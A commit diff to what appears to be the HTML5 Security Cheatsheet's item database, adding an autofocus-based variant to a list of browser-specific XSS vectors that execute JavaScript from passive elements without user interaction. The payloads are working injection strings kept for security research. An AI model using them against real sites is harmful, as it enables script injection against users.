Added new #145 variation working in Blink

cure53 · cure53 · commit 1a91bbc08542 · 2022-02-23T17:46:18.000+01:00
diff --git a/items.js b/items.js
@@ -5165,7 +5165,7 @@ return [
             'de'    : '',
             'zh'    : ''
         },
-        'data'      : '#Chrome, Opera, Safari and Edge\r\n<div onfocus="%js_alert%" contenteditable tabindex="0" id="xss"></div>\r\n<div style="-webkit-user-modify:read-write" onfocus="%js_alert%" id="xss">\r\n<div style="-webkit-user-modify:read-write-plaintext-only" onfocus="%js_alert%" id="xss">\r\n\r\n# Firefox\r\n<div onbeforescriptexecute="%js_alert%"></div>\r\n<script>1</script>\r\n\r\n#MSIE10/11 & Edge\r\n<div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll="%js_alert%">\r\n\r\n#MSIE10\r\n<div contenteditable onresize="%js_alert%"></div>\r\n\r\n# MSIE11\r\n<div onactivate="%js_alert%" id="xss" style="overflow:scroll"></div>\r\n<div onfocus="%js_alert%" id="xss" style="display:table">\r\n<div id="xss" style="-ms-block-progression:bt" onfocus="%js_alert%">\r\n<div id="xss" style="-ms-layout-flow:vertical-ideographic" onfocus="%js_alert%">\r\n<div id="xss" style="float:left" onfocus="%js_alert%">\r\n\r\n# Chrome, Opera, Safari\r\n<style>@keyframes x{}</style>\r\n<div style="animation-name:x" onanimationstart="%js_alert%"></div>\r\n\r\n# Chrome, Opera, Safari\r\n<style>\r\ndiv {width: 100px;}\r\ndiv:target {width: 200px;}\r\n</style>\r\n<div id="xss" onwebkittransitionend="%js_alert%" style="-webkit-transition: width .1s;"></div>\r\n\r\n# Safari\r\n<div style="overflow:-webkit-marquee" onscroll="alert(1)"></div>',
+        'data'      : '#Chrome, Opera, Safari and Edge\r\n<div contenteditable onfocus="%js_alert%" autofocus></div>\r\n<div onfocus="%js_alert%" contenteditable tabindex="0" id="xss"></div>\r\n<div style="-webkit-user-modify:read-write" onfocus="%js_alert%" id="xss">\r\n<div style="-webkit-user-modify:read-write-plaintext-only" onfocus="%js_alert%" id="xss">\r\n\r\n# Firefox\r\n<div onbeforescriptexecute="%js_alert%"></div>\r\n<script>1</script>\r\n\r\n#MSIE10/11 & Edge\r\n<div style="-ms-scroll-limit:1px;overflow:scroll;width:1px" onscroll="%js_alert%">\r\n\r\n#MSIE10\r\n<div contenteditable onresize="%js_alert%"></div>\r\n\r\n# MSIE11\r\n<div onactivate="%js_alert%" id="xss" style="overflow:scroll"></div>\r\n<div onfocus="%js_alert%" id="xss" style="display:table">\r\n<div id="xss" style="-ms-block-progression:bt" onfocus="%js_alert%">\r\n<div id="xss" style="-ms-layout-flow:vertical-ideographic" onfocus="%js_alert%">\r\n<div id="xss" style="float:left" onfocus="%js_alert%">\r\n\r\n# Chrome, Opera, Safari\r\n<style>@keyframes x{}</style>\r\n<div style="animation-name:x" onanimationstart="%js_alert%"></div>\r\n\r\n# Chrome, Opera, Safari\r\n<style>\r\ndiv {width: 100px;}\r\ndiv:target {width: 200px;}\r\n</style>\r\n<div id="xss" onwebkittransitionend="%js_alert%" style="-webkit-transition: width .1s;"></div>\r\n\r\n# Safari\r\n<div style="overflow:-webkit-marquee" onscroll="alert(1)"></div>',
         'description' : {
             'en'    : 'Often, an attacker can only inject into a "passive" element, meaning for instance a DIV or a SPAN. For those elements, it\'s not always trivial to execute injected JavaScript without user interaction (such as clicks or mouse events). If the element injected into is outside the visible range, it becomes hard to prove that the injection is in fact exploitable. For this reason, this item lists all currently known ways of executing JavaScript without user interaction from passive elements. The list is expected to grow over time.\r\n\r\nNote, that for some of the attacks here, the string "#xss" needs to be appended to the URL of the injected page.',
             'ja'    : '',
@@ -5190,8 +5190,8 @@ return [
             'firefox' : ['4.x', 'latest'],
             'safari' : ['4.0', 'latest']
         },
-        'tags'      : ['user interaction', 'passive elements', 'html5', 'css', 'contenteditable'],
-        'reporter'  : '.mario, Ben Hayak, avlidienbrunn, Masato Kinugawa'
+        'tags'      : ['user interaction', 'passive elements', 'html5', 'css', 'contenteditable', 'autofocus'],
+        'reporter'  : '.mario, Ben Hayak, avlidienbrunn, Masato Kinugawa, Renwa, F. Stuhlmann'
     },
     { /* ID 146 - JavaScript execution via <FRAMESET> and onpageshow  */
         'id'         : 146,
